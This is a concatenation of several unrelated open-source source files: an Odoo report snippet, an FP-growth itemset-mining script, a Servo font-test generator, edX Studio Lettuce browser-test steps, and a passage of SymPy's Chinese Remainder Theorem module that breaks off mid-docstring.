def _print_report(self, cr, uid, ids, data, context=None):
data = self.pre_print_report(cr, uid, ids, data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_centraljournal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
freestyle4568/Clothes-match | feature_analysis/src/fp_growth.py | 1 | 6357 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Created on Sep 20, 2015
@author: freestyle4568
'''
"""
this progarm is to test fp-growth algorithm
user guide: result_list, support_data_dict = fptree(dataset, min_support)
该函数返回列表格式的result_list, 元素为列表, [[1元素项集], [2元素项集]]
子列表元素为固定集合 -- frozenset({, , ,})
support_data_dict为字典格式,元素为(frozenset({}): number)
"""
from operator import itemgetter
class TreeNode:
def __init__(self, name_value, num_occur, parent_node):
self.name = name_value
self.count = num_occur
self.nodelink = None
self.parent = parent_node
self.children = {}
def inc(self, num_occur):
self.count += num_occur
def disp(self, index=1):
print(' '*index, self.name, ' ', self.count)
for child in self.children.values():
child.disp(index+1)
return
def create_tree(dataset, min_support=1):
header_table = {}
for trans in dataset:
for item in trans:
header_table[item] = header_table.get(item, 0) + dataset[trans]
tmp_keys = list(header_table.keys())
for k in tmp_keys:
if header_table[k] < min_support:
header_table.pop(k)
#print("frist header_table is: ", header_table)
freqitem_set = set(header_table.keys())
if len(freqitem_set) == 0:
#raise RuntimeError('no freqitems satisfy this min_support')
return None, None
for k in header_table:
header_table[k] = [header_table[k], None]
result_tree = TreeNode('NullNode', 1, None)
for transaction, count in dataset.items():
local_data = {}
for item in transaction:
if item in freqitem_set:
local_data[item] = header_table[item][0]
if len(local_data) > 0:
ordered_items = [v[0] for v in sorted(local_data.items(),
key = itemgetter(1, 0), reverse = True)]
update_tree(ordered_items, result_tree, header_table, count)
return result_tree, header_table
def update_tree(items, tree, header_table, count):
if items[0] in tree.children:
tree.children[items[0]].inc(count)
else:
tree.children[items[0]] = TreeNode(items[0], count, tree)
if header_table[items[0]][1] == None:
header_table[items[0]][1] = tree.children[items[0]]
else:
update_header(header_table[items[0]][1],
tree.children[items[0]])
if len(items) > 1:
update_tree(items[1:], tree.children[items[0]], header_table, count)
return
def update_header(node_to_test, target_node):
while (node_to_test.nodelink != None):
node_to_test = node_to_test.nodelink
node_to_test.nodelink = target_node
return
def load_simple_data():
simple_data = [['r', 'z', 'h', 'j', 'p'],
['z', 'y', 'x', 'w', 'v', 'u', 't', 's'],
['z'],
['r', 'x', 'n', 'o', 's'],
['y', 'r', 'x', 'z', 'q', 't', 'p'],
['y', 'z', 'x', 'e', 'q', 's', 't', 'm']
]
return simple_data
def create_init_set(dataset):
result_dict = {}
for d in dataset:
result_dict[frozenset(d)] = 1
return result_dict
def ascend_tree(leaf_node, prefix_path):
if leaf_node.parent != None:
prefix_path.append(leaf_node.name)
ascend_tree(leaf_node.parent, prefix_path)
return
def find_prefix_path(tree_node):
condition_path = {}
while tree_node != None:
prefix_path = []
ascend_tree(tree_node, prefix_path)
if len(prefix_path) > 1:
condition_path[frozenset(prefix_path[1:])] = tree_node.count
tree_node = tree_node.nodelink
return condition_path
def mine_tree(tree, header_table, min_support, prefix, freqitem_list, support_list):
big_list = [v[0] for v in sorted(header_table.items(), key = lambda p: p[1][0])]
for base in big_list:
new_freq_set = prefix.copy()
new_freq_set.add(base)
freqitem_list.append(new_freq_set)
#print(new_freq_set)
support_list.append(header_table[base][0])
condition_path = find_prefix_path(header_table[base][1])
condition_tree, condition_header_table = create_tree(condition_path, min_support)
if condition_header_table != None:
mine_tree(condition_tree, condition_header_table, min_support, new_freq_set, freqitem_list, support_list)
def resultlist2dict(freqitem_list, support_list):
result_list = []
len_result = len(freqitem_list)
support_data = {}
max_element_number = 0
for i in range(len_result):
support_data.update({frozenset(freqitem_list[i]): support_list[i]})
if max_element_number < len(freqitem_list[i]):
max_element_number = len(freqitem_list[i])
for k in range(max_element_number):
c = []
tmp_list = freqitem_list.copy()
for freqset in tmp_list:
if len(freqset) == k+1:
c.append(frozenset(freqset))
freqitem_list.remove(freqset)
result_list.append(c)
return result_list, support_data
def fptree(dataset, min_support):
data_len = len(dataset)
dataset_dict = create_init_set(dataset)
FPtree, header_table = create_tree(dataset_dict, min_support)
freqitem_list = []
support_list = []
mine_tree(FPtree, header_table, min_support, set([]), freqitem_list, support_list)
result_list, support_data = resultlist2dict(freqitem_list, support_list)
for i in support_data:
support_data[i] = support_data[i]/data_len
return result_list, support_data
if __name__ == '__main__':
filename = '/home/freestyle4568/lesson/Clothes-match-txt/user_catset.txt'
fr = open(filename)
dataset = []
for line in fr.readlines():
catset = line.split()[1]
dataset.append(catset.split(','))
for i in range(10):
print(dataset[i])
dataset = load_simple_data()
result_list, support_data = fptree(dataset, 3)
for i in result_list:
print(i)
print(len(support_data))
for j in support_data.items():
print(j)
| apache-2.0 |
rixrix/servo | tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py | 820 | 14309 |
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# parse
values = line.split("\t")
tag = values.pop(0)
mapping.append(tag);
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
charStringsIndex.append(charString)
glyphID = len(topDict.charset)
charStrings.charStrings[glyphName] = glyphID
topDict.charset.append(glyphName)
def makeLookup1():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
# bump this up so that the sequence is the same as the lookup 3 font
cp += 3
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 1
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = SingleSubst()
subtable.Format = 2
subtable.LookupType = 1
subtable.mapping = {
"%s.pass" % tag : "%s.fail" % tag,
"%s.fail" % tag : "%s.pass" % tag,
}
lookup.SubTable.append(subtable)
path = outputPath % 1 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeLookup3():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
# tag.default
glyphName = "%s.default" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.alt1,2,3
for i in range(1,4):
glyphName = "%s.alt%d" % (tag, i)
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 3
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = AlternateSubst()
subtable.Format = 1
subtable.LookupType = 3
subtable.alternates = {
"%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
"%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
}
lookup.SubTable.append(subtable)
path = outputPath % 3 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeJavascriptData():
features = sorted(mapping)
outStr = []
outStr.append("")
outStr.append("/* This file is autogenerated by makegsubfonts.py */")
outStr.append("")
outStr.append("/* ")
outStr.append(" Features defined in gsubtest fonts with associated base")
outStr.append(" codepoints for each feature:")
outStr.append("")
outStr.append(" cp = codepoint for feature featX")
outStr.append("")
outStr.append(" cp default PASS")
outStr.append(" cp featX=1 FAIL")
outStr.append(" cp featX=2 FAIL")
outStr.append("")
outStr.append(" cp+1 default FAIL")
outStr.append(" cp+1 featX=1 PASS")
outStr.append(" cp+1 featX=2 FAIL")
outStr.append("")
outStr.append(" cp+2 default FAIL")
outStr.append(" cp+2 featX=1 FAIL")
outStr.append(" cp+2 featX=2 PASS")
outStr.append("")
outStr.append("*/")
outStr.append("")
outStr.append("var gFeatures = {");
cp = baseCodepoint
taglist = []
for tag in features:
taglist.append("\"%s\": 0x%x" % (tag, cp))
cp += 4
outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
outStr.append("};");
outStr.append("");
if os.path.exists(javascriptData):
os.remove(javascriptData)
f = open(javascriptData, "wb")
f.write("\n".join(outStr))
f.close()
# build fonts
print "Making lookup type 1 font..."
makeLookup1()
print "Making lookup type 3 font..."
makeLookup3()
# output javascript data
print "Making javascript data file..."
makeJavascriptData() | mpl-2.0 |
analyseuc3m/ANALYSE-v1 | cms/djangoapps/contentstore/features/common.py | 60 | 12732 | # pylint: disable=missing-docstring
# pylint: disable=redefined-outer-name
import os
from lettuce import world, step
from nose.tools import assert_true, assert_in
from django.conf import settings
from student.roles import CourseStaffRole, CourseInstructorRole, GlobalStaff
from student.models import get_user
from selenium.webdriver.common.keys import Keys
from logging import getLogger
from student.tests.factories import AdminFactory
from student import auth
logger = getLogger(__name__)
from terrain.browser import reset_data
TEST_ROOT = settings.COMMON_TEST_DATA_ROOT
@step('I (?:visit|access|open) the Studio homepage$')
def i_visit_the_studio_homepage(_step):
# To make this go to port 8001, put
# LETTUCE_SERVER_PORT = 8001
# in your settings.py file.
world.visit('/')
signin_css = 'a.action-signin'
assert world.is_css_present(signin_css)
@step('I am logged into Studio$')
def i_am_logged_into_studio(_step):
log_into_studio()
@step('I confirm the alert$')
def i_confirm_with_ok(_step):
world.browser.get_alert().accept()
@step(u'I press the "([^"]*)" delete icon$')
def i_press_the_category_delete_icon(_step, category):
if category == 'section':
css = 'a.action.delete-section-button'
elif category == 'subsection':
css = 'a.action.delete-subsection-button'
else:
assert False, 'Invalid category: %s' % category
world.css_click(css)
@step('I have opened a new course in Studio$')
def i_have_opened_a_new_course(_step):
open_new_course()
@step('I have populated a new course in Studio$')
def i_have_populated_a_new_course(_step):
world.clear_courses()
course = world.CourseFactory.create()
world.scenario_dict['COURSE'] = course
section = world.ItemFactory.create(parent_location=course.location)
world.ItemFactory.create(
parent_location=section.location,
category='sequential',
display_name='Subsection One',
)
user = create_studio_user(is_staff=False)
add_course_author(user, course)
log_into_studio()
world.css_click('a.course-link')
world.wait_for_js_to_load()
@step('(I select|s?he selects) the new course')
def select_new_course(_step, whom):
course_link_css = 'a.course-link'
world.css_click(course_link_css)
@step(u'I press the "([^"]*)" notification button$')
def press_the_notification_button(_step, name):
# Because the notification uses a CSS transition,
# Selenium will always report it as being visible.
# This makes it very difficult to successfully click
# the "Save" button at the UI level.
# Instead, we use JavaScript to reliably click
# the button.
btn_css = 'div#page-notification button.action-%s' % name.lower()
world.trigger_event(btn_css, event='focus')
world.browser.execute_script("$('{}').click()".format(btn_css))
world.wait_for_ajax_complete()
@step('I change the "(.*)" field to "(.*)"$')
def i_change_field_to_value(_step, field, value):
field_css = '#%s' % '-'.join([s.lower() for s in field.split()])
ele = world.css_find(field_css).first
ele.fill(value)
ele._element.send_keys(Keys.ENTER)
@step('I reset the database')
def reset_the_db(_step):
"""
When running Lettuce tests using examples (i.e. "Confirmation is
shown on save" in course-settings.feature), the normal hooks
aren't called between examples. reset_data should run before each
scenario to flush the test database. When this doesn't happen we
get errors due to trying to insert a non-unique entry. So instead,
we delete the database manually. This has the effect of removing
any users and courses that have been created during the test run.
"""
reset_data(None)
@step('I see a confirmation that my changes have been saved')
def i_see_a_confirmation(step):
confirmation_css = '#alert-confirmation'
assert world.is_css_present(confirmation_css)
def open_new_course():
world.clear_courses()
create_studio_user()
log_into_studio()
create_a_course()
def create_studio_user(
uname='robot',
email='[email protected]',
password='test',
is_staff=False):
studio_user = world.UserFactory(
username=uname,
email=email,
password=password,
is_staff=is_staff)
registration = world.RegistrationFactory(user=studio_user)
registration.register(studio_user)
registration.activate()
return studio_user
def fill_in_course_info(
name='Robot Super Course',
org='MITx',
num='101',
run='2013_Spring'):
world.css_fill('.new-course-name', name)
world.css_fill('.new-course-org', org)
world.css_fill('.new-course-number', num)
world.css_fill('.new-course-run', run)
def log_into_studio(
uname='robot',
email='[email protected]',
password='test',
name='Robot Studio'):
world.log_in(username=uname, password=password, email=email, name=name)
# Navigate to the studio dashboard
world.visit('/')
assert_in(uname, world.css_text('span.account-username', timeout=10))
def add_course_author(user, course):
"""
Add the user to the instructor group of the course
so they will have the permissions to see it in studio
"""
global_admin = AdminFactory()
for role in (CourseStaffRole, CourseInstructorRole):
auth.add_users(global_admin, role(course.id), user)
def create_a_course():
course = world.CourseFactory.create(org='MITx', course='999', display_name='Robot Super Course')
world.scenario_dict['COURSE'] = course
user = world.scenario_dict.get("USER")
if not user:
user = get_user('[email protected]')
add_course_author(user, course)
# Navigate to the studio dashboard
world.visit('/')
course_link_css = 'a.course-link'
world.css_click(course_link_css)
course_title_css = 'span.course-title'
assert_true(world.is_css_present(course_title_css))
def add_section():
world.css_click('.outline .button-new')
assert_true(world.is_css_present('.outline-section .xblock-field-value'))
def set_date_and_time(date_css, desired_date, time_css, desired_time, key=None):
set_element_value(date_css, desired_date, key)
world.wait_for_ajax_complete()
set_element_value(time_css, desired_time, key)
world.wait_for_ajax_complete()
def set_element_value(element_css, element_value, key=None):
element = world.css_find(element_css).first
element.fill(element_value)
# hit TAB or provided key to trigger save content
if key is not None:
element._element.send_keys(getattr(Keys, key)) # pylint: disable=protected-access
else:
element._element.send_keys(Keys.TAB) # pylint: disable=protected-access
@step('I have enabled the (.*) advanced module$')
def i_enabled_the_advanced_module(step, module):
step.given('I have opened a new course section in Studio')
world.css_click('.nav-course-settings')
world.css_click('.nav-course-settings-advanced a')
type_in_codemirror(0, '["%s"]' % module)
press_the_notification_button(step, 'Save')
@world.absorb
def create_unit_from_course_outline():
"""
Expands the section and clicks on the New Unit link.
The end result is the page where the user is editing the new unit.
"""
css_selectors = [
'.outline-subsection .expand-collapse', '.outline-subsection .button-new'
]
for selector in css_selectors:
world.css_click(selector)
world.wait_for_mathjax()
world.wait_for_xmodule()
world.wait_for_loading()
assert world.is_css_present('ul.new-component-type')
@world.absorb
def wait_for_loading():
"""
Waits for the loading indicator to be hidden.
"""
world.wait_for(lambda _driver: len(world.browser.find_by_css('div.ui-loading.is-hidden')) > 0)
@step('I have clicked the new unit button$')
@step(u'I am in Studio editing a new unit$')
def edit_new_unit(step):
step.given('I have populated a new course in Studio')
create_unit_from_course_outline()
@step('the save notification button is disabled')
def save_button_disabled(step):
button_css = '.action-save'
disabled = 'is-disabled'
assert world.css_has_class(button_css, disabled)
@step('the "([^"]*)" button is disabled')
def button_disabled(step, value):
button_css = 'input[value="%s"]' % value
assert world.css_has_class(button_css, 'is-disabled')
def _do_studio_prompt_action(intent, action):
"""
Wait for a studio prompt to appear and press the specified action button
See common/js/components/views/feedback_prompt.js for implementation
"""
assert intent in [
'warning',
'error',
'confirmation',
'announcement',
'step-required',
'help',
'mini',
]
assert action in ['primary', 'secondary']
world.wait_for_present('div.wrapper-prompt.is-shown#prompt-{}'.format(intent))
action_css = 'li.nav-item > button.action-{}'.format(action)
world.trigger_event(action_css, event='focus')
world.browser.execute_script("$('{}').click()".format(action_css))
world.wait_for_ajax_complete()
world.wait_for_present('div.wrapper-prompt.is-hiding#prompt-{}'.format(intent))
@world.absorb
def confirm_studio_prompt():
_do_studio_prompt_action('warning', 'primary')
@step('I confirm the prompt')
def confirm_the_prompt(step):
confirm_studio_prompt()
@step(u'I am shown a prompt$')
def i_am_shown_a_notification(step):
assert world.is_css_present('.wrapper-prompt')
def type_in_codemirror(index, text, find_prefix="$"):
script = """
var cm = {find_prefix}('div.CodeMirror:eq({index})').get(0).CodeMirror;
cm.getInputField().focus();
cm.setValue(arguments[0]);
cm.getInputField().blur();""".format(index=index, find_prefix=find_prefix)
world.browser.driver.execute_script(script, str(text))
world.wait_for_ajax_complete()
def get_codemirror_value(index=0, find_prefix="$"):
return world.browser.driver.execute_script(
"""
return {find_prefix}('div.CodeMirror:eq({index})').get(0).CodeMirror.getValue();
""".format(index=index, find_prefix=find_prefix)
)
def attach_file(filename, sub_path):
path = os.path.join(TEST_ROOT, sub_path, filename)
world.browser.execute_script("$('input.file-input').css('display', 'block')")
assert_true(os.path.exists(path))
world.browser.attach_file('file', os.path.abspath(path))
def upload_file(filename, sub_path=''):
# The file upload dialog is a faux modal, a div that takes over the display
attach_file(filename, sub_path)
modal_css = 'div.wrapper-modal-window-assetupload'
button_css = '{} .action-upload'.format(modal_css)
world.css_click(button_css)
# Clicking the Upload button triggers an AJAX POST.
world.wait_for_ajax_complete()
# The modal stays up with a "File uploaded succeeded" confirmation message, then goes away.
# It should take under 2 seconds, so wait up to 10.
# Note that is_css_not_present will return as soon as the element is gone.
assert world.is_css_not_present(modal_css, wait_time=10)
@step(u'"([^"]*)" logs in$')
def other_user_login(step, name):
step.given('I log out')
world.visit('/')
signin_css = 'a.action-signin'
world.is_css_present(signin_css)
world.css_click(signin_css)
def fill_login_form():
login_form = world.browser.find_by_css('form#login_form')
login_form.find_by_name('email').fill(name + '@edx.org')
login_form.find_by_name('password').fill("test")
login_form.find_by_name('submit').click()
world.retry_on_exception(fill_login_form)
assert_true(world.is_css_present('.new-course-button'))
world.scenario_dict['USER'] = get_user(name + '@edx.org')
@step(u'the user "([^"]*)" exists( as a course (admin|staff member|is_staff))?$')
def create_other_user(_step, name, has_extra_perms, role_name):
email = name + '@edx.org'
user = create_studio_user(uname=name, password="test", email=email)
if has_extra_perms:
if role_name == "is_staff":
GlobalStaff().add_users(user)
else:
if role_name == "admin":
# admins get staff privileges, as well
roles = (CourseStaffRole, CourseInstructorRole)
else:
roles = (CourseStaffRole,)
course_key = world.scenario_dict["COURSE"].id
global_admin = AdminFactory()
for role in roles:
auth.add_users(global_admin, role(course_key), user)
@step('I log out')
def log_out(_step):
world.visit('logout')
| agpl-3.0 |
rahuldan/sympy | sympy/ntheory/modular.py | 108 | 7676 | from __future__ import print_function, division
from sympy.core.numbers import igcdex, igcd
from sympy.core.mul import prod
from sympy.core.compatibility import as_int, reduce
from sympy.ntheory.primetest import isprime
from sympy.polys.domains import ZZ
from sympy.polys.galoistools import gf_crt, gf_crt1, gf_crt2
def symmetric_residue(a, m):
"""Return the residual mod m such that it is within half of the modulus.
>>> from sympy.ntheory.modular import symmetric_residue
>>> symmetric_residue(1, 6)
1
>>> symmetric_residue(4, 6)
-2
"""
if a <= m // 2:
return a
return a - m
def crt(m, v, symmetric=False, check=True):
r"""Chinese Remainder Theorem.
The moduli in m are assumed to be pairwise coprime. The output
is then an integer f, such that f = v_i mod m_i for each pair out
of v and m. If ``symmetric`` is False a positive integer will be
returned, else \|f\| will be less than or equal to the LCM of the
moduli, and thus f may be negative.
If the moduli are not co-prime the correct result will be returned
if/when the test of the result is found to be incorrect. This result
will be None if there is no solution.
The keyword ``check`` can be set to False if it is known that the moduli
are coprime.
As an example consider a set of residues ``U = [49, 76, 65]``
and a set of moduli ``M = [99, 97, 95]``. Then we have::
>>> from sympy.ntheory.modular import crt, solve_congruence
>>> crt([99, 97, 95], [49, 76, 65])
(639985, 912285)
This is the correct result because::
>>> [639985 % m for m in [99, 97, 95]]
[49, 76, 65]
If the moduli are not co-prime, you may receive an incorrect result
if you use ``check=False``:
>>> crt([12, 6, 17], [3, 4, 2], check=False)
(954, 1224)
>>> [954 % m for m in [12, 6, 17]]
[6, 0, 2]
>>> crt([12, 6, 17], [3, 4, 2]) is None
True
>>> crt([3, 6], [2, 5])
(5, 6)
Note: the order of gf_crt's arguments is reversed relative to crt,
and that solve_congruence takes residue, modulus pairs.
Programmer's note: rather than checking that all pairs of moduli share
no GCD (an O(n**2) test) and rather than factoring all moduli and seeing
that there is no factor in common, a check that the result gives the
indicated residuals is performed -- an O(n) operation.
See Also
========
solve_congruence
sympy.polys.galoistools.gf_crt : low level crt routine used by this routine
"""
if check:
m = list(map(as_int, m))
v = list(map(as_int, v))
result = gf_crt(v, m, ZZ)
mm = prod(m)
if check:
if not all(v % m == result % m for v, m in zip(v, m)):
result = solve_congruence(*list(zip(v, m)),
check=False, symmetric=symmetric)
if result is None:
return result
result, mm = result
if symmetric:
return symmetric_residue(result, mm), mm
return result, mm
def crt1(m):
"""First part of Chinese Remainder Theorem, for multiple application.
Examples
========
>>> from sympy.ntheory.modular import crt1
>>> crt1([18, 42, 6])
(4536, [252, 108, 756], [0, 2, 0])
"""
return gf_crt1(m, ZZ)
def crt2(m, v, mm, e, s, symmetric=False):
"""Second part of Chinese Remainder Theorem, for multiple application.
Examples
========
>>> from sympy.ntheory.modular import crt1, crt2
>>> mm, e, s = crt1([18, 42, 6])
>>> crt2([18, 42, 6], [0, 0, 0], mm, e, s)
(0, 4536)
"""
result = gf_crt2(v, m, mm, e, s, ZZ)
if symmetric:
return symmetric_residue(result, mm), mm
return result, mm
def solve_congruence(*remainder_modulus_pairs, **hint):
"""Compute the integer ``n`` that has the residual ``ai`` when it is
divided by ``mi`` where the ``ai`` and ``mi`` are given as pairs to
this function: ((a1, m1), (a2, m2), ...). If there is no solution,
return None. Otherwise return ``n`` and its modulus.
The ``mi`` values need not be co-prime. If it is known that the moduli are
not co-prime then the hint ``check`` can be set to False (default=True) and
the check for a quicker solution via crt() (valid when the moduli are
co-prime) will be skipped.
If the hint ``symmetric`` is True (default is False), the value of ``n``
will be within 1/2 of the modulus, possibly negative.
Examples
========
>>> from sympy.ntheory.modular import solve_congruence
What number is 2 mod 3, 3 mod 5 and 2 mod 7?
>>> solve_congruence((2, 3), (3, 5), (2, 7))
(23, 105)
>>> [23 % m for m in [3, 5, 7]]
[2, 3, 2]
If you prefer to work with all remainder in one list and
